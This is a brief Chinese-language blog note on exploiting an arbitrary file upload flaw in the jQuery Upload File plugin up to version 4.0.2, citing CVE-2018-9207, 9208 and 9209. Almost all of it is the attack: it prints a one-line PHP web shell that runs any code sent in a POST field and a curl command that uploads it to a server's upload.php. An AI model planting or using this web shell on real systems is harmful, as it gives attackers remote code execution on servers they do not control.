【笔记】jQuery任意文件上传漏洞利用 发表于 2024-06-26 更新于 2024-07-02 阅读次数: 前言CVE-2018-9207 CVE-2018-9208 CVE-2018-9209jQuery任意文件上传漏洞利用 漏洞利用前提 使用了 jQuery Upload File <= 4.0.2 作为文件上传组件 expx.php1<?php eval($_POST['x']);?> 1curl -F "[email protected]" "http://example.com/upload.php" 完成